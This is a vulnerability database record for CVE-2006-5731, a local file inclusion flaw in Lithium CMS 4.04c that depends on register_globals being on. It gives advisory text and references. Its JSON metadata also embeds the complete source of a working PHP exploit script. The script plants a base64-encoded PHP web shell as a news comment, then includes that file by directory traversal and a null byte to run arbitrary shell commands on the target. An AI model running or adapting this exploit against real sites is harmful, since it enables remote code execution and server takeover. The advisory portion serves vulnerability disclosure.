ID OSVDB:30217
Type osvdb
Reporter OSVDB
Modified 2006-11-02T11:48:43
Description
Technical Description
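This vulnerability (CVE-2006-5731) is a directory traversal in classes/index.php of Lithium CMS 4.04c and earlier: a .. (dot dot) sequence in the siteconf[curl] parameter lets a remote attacker include and execute arbitrary local files. It is only present when the register_globals PHP option is set to 'on', because that setting is what allows a request parameter to populate the siteconf variable. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002), so installations that leave register_globals off are not exposed to this issue.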
References:
Vendor URL: http://s.cmsdev.ru/
Secunia Advisory ID: 22593
ISS X-Force ID: 29966
Generic Exploit URL: http://www.milw0rm.com/exploits/2702
FrSIRT Advisory: ADV-2006-4361
CVE-2006-5731
{"bulletinFamily": "software", "viewCount": 5, "reporter": "OSVDB", "references": [], "description": "## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## References:\nVendor URL: http://s.cmsdev.ru/\n[Secunia Advisory ID:22593](https://secuniaresearch.flexerasoftware.com/advisories/22593/)\nISS X-Force ID: 29966\nGeneric Exploit URL: http://www.milw0rm.com/exploits/2702\nFrSIRT Advisory: ADV-2006-4361\n[CVE-2006-5731](https://vulners.com/cve/CVE-2006-5731)\n", "affectedSoftware": [], "href": "https://vulners.com/osvdb/OSVDB:30217", "modified": "2006-11-02T11:48:43", "enchantments": {"score": {"value": 6.5, "vector": "NONE", "modified": "2017-04-28T13:20:26", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-5731"]}, {"type": "exploitdb", "idList": ["EDB-ID:2702"]}], "modified": "2017-04-28T13:20:26", "rev": 2}, "vulnersScore": 6.5}, "id": "OSVDB:30217", "title": "Lithium CMS /classes/index.php siteconf[curl] Traversal Arbitrary File Execution", "edition": 1, "published": "2006-11-02T11:48:43", "type": "osvdb", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "cvelist": ["CVE-2006-5731"], "lastseen": "2017-04-28T13:20:26"}
{"cve": [{"lastseen": "2020-12-09T19:23:49", "description": "Directory traversal vulnerability in classes/index.php in Lithium CMS 4.04c and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the siteconf[curl] parameter, as demonstrated by a POST to news/comment.php containing PHP code, which is stored under db/comments/news/ and included by classes/index.php.", "edition": 5, "cvss3": {}, "published": "2006-11-06T18:07:00", "title": "CVE-2006-5731", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-5731"], "modified": "2017-10-19T01:29:00", "cpe": ["cpe:/a:lithium_cms:lithium_cms:4.04c"], "id": "CVE-2006-5731", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-5731", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}, "cpe23": ["cpe:2.3:a:lithium_cms:lithium_cms:4.04c:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-01-31T16:51:19", "description": "Lithium CMS <= 4.04c (classes/index.php) Local File Include Exploit. CVE-2006-5731. 
Webapps exploit for php platform", "published": "2006-11-02T00:00:00", "type": "exploitdb", "title": "Lithium CMS <= 4.04c classes/index.php Local File Include Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5731"], "modified": "2006-11-02T00:00:00", "id": "EDB-ID:2702", "href": "https://www.exploit-db.com/exploits/2702/", "sourceData": "<?\n\nprint '\n::::::::: :::::::::: ::: ::: ::::::::::: ::: \n:+: :+: :+: :+: :+: :+: :+: \n+:+ +:+ +:+ +:+ +:+ +:+ +:+ \n+#+ +:+ +#++:++# +#+ +:+ +#+ +#+ \n+#+ +#+ +#+ +#+ +#+ +#+ +#+ \n#+# #+# #+# #+#+#+# #+# #+# \n######### ########## ### ########### ########## \n::::::::::: :::::::::: ::: :::: :::: \n :+: :+: :+: :+: +:+:+: :+:+:+ \n +:+ +:+ +:+ +:+ +:+ +:+:+ +:+ \n +#+ +#++:++# +#++:++#++: +#+ +:+ +#+ \n +#+ +#+ +#+ +#+ +#+ +#+ \n #+# #+# #+# #+# #+# #+# \n ### ########## ### ### ### ### \n\t\n - - [DEVIL TEAM THE BEST POLISH TEAM] - -\n \nLithium CMS <= 4.04c Remote Code Execution Exploit\n\n[Script name: Lithium 4.04c\n[Script site: https://sourceforge.net/projects/lit/\n\nFind by: Kacper (a.k.a Rahim)\n\n\n========> DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam <========\n\n\n\nContact: kacper1964@yahoo.pl\n\nor\n\nhttp://www.rahim.webd.pl/\n\n\n(c)od3d by Kacper\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\nGreetings DragonHeart and all DEVIL TEAM Patriots :)\n- Leito & Leon \nTomZen, Gelo, Ramzes, DMX, Ci2u, Larry, @steriod, Drzewko, CrazzyIwan, Rammstein\nAdam., Kicaj., DeathSpeed, Arkadius, Michas, pepi, nukedclx, SkD, MXZ, sysios, \nmIvus, nukedclx, SkD, wacky, xoron\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\n Greetings for 4ll Fusi0n Group members ;-)\n\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n';\n\nif ($argc<5) {\nprint_r('\n-----------------------------------------------------------------------------\nUsage: php '.$argv[0].' 
host path comments_id cmd OPTIONS\nhost: target server (ip/hostname)\npath: Lithium path\ncomments_id: number of news what is in site\ncmd: a shell command (ls -la)\nOptions:\n -p[port]: specify a port other than 80\n -P[ip:port]: specify a proxy\nExample:\nphp '.$argv[0].' 2.2.2.2 /Lithium/ 2006.10.30 ls -la -P1.1.1.1:80\nphp '.$argv[0].' 1.1.1.1 / -p81\n-----------------------------------------------------------------------------\n');\n\ndie;\n}\n\nerror_reporting(0);\nini_set(\"max_execution_time\",0);\nini_set(\"default_socket_timeout\",5);\n\nfunction quick_dump($string)\n{\n $result='';$exa='';$cont=0;\n for ($i=0; $i<=strlen($string)-1; $i++)\n {\n if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))\n {$result.=\" .\";}\n else\n {$result.=\" \".$string[$i];}\n if (strlen(dechex(ord($string[$i])))==2)\n {$exa.=\" \".dechex(ord($string[$i]));}\n else\n {$exa.=\" 0\".dechex(ord($string[$i]));}\n $cont++;if ($cont==15) {$cont=0; $result.=\"\\r\\n\"; $exa.=\"\\r\\n\";}\n }\n return $exa.\"\\r\\n\".$result;\n}\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\nfunction sendpacket($packet)\n{\n global $proxy, $host, $port, $html, $proxy_regex;\n if ($proxy=='') {\n $ock=fsockopen(gethostbyname($host),$port);\n if (!$ock) {\n echo 'No response from '.$host.':'.$port; die;\n }\n }\n else {\n\t$c = preg_match($proxy_regex,$proxy);\n if (!$c) {\n echo 'Not a valid proxy...';die;\n }\n $parts=explode(':',$proxy);\n echo \"Connecting to \".$parts[0].\":\".$parts[1].\" proxy...\\r\\n\";\n $ock=fsockopen($parts[0],$parts[1]);\n if (!$ock) {\n echo 'No response from proxy...';die;\n\t}\n }\n fputs($ock,$packet);\n if ($proxy=='') {\n $html='';\n while (!feof($ock)) {\n $html.=fgets($ock);\n }\n }\n else {\n $html='';\n while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {\n $html.=fread($ock,1);\n }\n }\n fclose($ock);\n}\nfunction make_seed()\n{\n list($usec, $sec) = explode(' ', microtime());\n return 
(float) $sec + ((float) $usec * 100000);\n}\n\n$host=$argv[1];\n$path=$argv[2];\n$comments_id=$argv[3];\n$cmd=\"\";\n\n$port=80;\n$proxy=\"\";\nfor ($i=4; $i<$argc; $i++){\n$temp=$argv[$i][0].$argv[$i][1];\nif (($temp<>\"-p\") and ($temp<>\"-P\")) {$cmd.=\" \".$argv[$i];}\nif ($temp==\"-p\")\n{\n $port=str_replace(\"-p\",\"\",$argv[$i]);\n}\nif ($temp==\"-P\")\n{\n $proxy=str_replace(\"-P\",\"\",$argv[$i]);\n}\n}\nif ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}\n$hauru = base64_decode(\"PD9waHAgb2JfY2xlYW4oKTsvL1J1Y2hvbXkgemFtZWsgSGF1cnUgOy0pZWNobyIuLi5IYWNrZXIuLkthY3Blci4uTWFkZS4uaW4uLlBvbGFuZCEhLi4uREVWSUwuVEVBTS4udGhlLi5iZXN0Li5wb2xpc2guLnRlYW0uLkdyZWV0ei4uLiI7ZWNobyIuLi5HbyBUbyBERVZJTCBURUFNIElSQzogNzIuMjAuMTguNjo2NjY3ICNkZXZpbHRlYW0iO2VjaG8iLi4uREVWSUwgVEVBTSBTSVRFOiBodHRwOi8vd3d3LnJhaGltLndlYmQucGwvIjtpbmlfc2V0KCJtYXhfZXhlY3V0aW9uX3RpbWUiLDApO2VjaG8gIkhhdXJ1IjtwYXNzdGhydSgkX1NFUlZFUltIVFRQX0hBVVJVXSk7ZGllOz8+\");\n$data.='-----------------------------7d6224c08dc\nContent-Disposition: form-data; name=\"name\"\n\nHauru\n-----------------------------7d6224c08dc\nContent-Disposition: form-data; name=\"www\"\n\nhttp://www.rahim.webd.pl/\n-----------------------------7d6224c08dc\nContent-Disposition: form-data; name=\"text\"\n\n'.$hauru.'\n-----------------------------7d6224c08dc\nContent-Disposition: form-data; name=\"new_comment\"\n\nAdd comment\n-----------------------------7d6224c08dc--\n';\n\n\necho \"creat hauru...\\n\";\n$packet =\"POST \".$p.\"news/comment.php/\".$comments_id.\" HTTP/1.0\\r\\n\";\n$packet.=\"Content-Type: multipart/form-data; boundary=---------------------------7d6224c08dc\\r\\n\";\n$packet.=\"Content-Length: \".strlen($data).\"\\r\\n\";\n$packet.=\"Host: \".$host.\"\\r\\n\";\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\n$packet.=$data;\nsendpacket($packet);\nsleep(1);\n\necho \"remote code execution...\\n\";\n$packet =\"GET \".$p.\"classes/index.php?siteconf[curl]=../../../db/comments/news/\".$comments_id.\"%00 
HTTP/1.1\\r\\n\";\n$packet.=\"HAURU: \".$cmd.\"\\r\\n\";\n$packet.=\"Host: \".$host.\"\\r\\n\";\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\nsendpacket($packet);\nif (strstr($html,\"Hauru\"))\n{\n$temp=explode(\"Hauru\",$html);\ndie($temp[1]);\n}\necho \"Exploit err0r :(\";\necho \"Go to DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam\";\n?>\n\n# milw0rm.com [2006-11-02]\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/2702/"}]}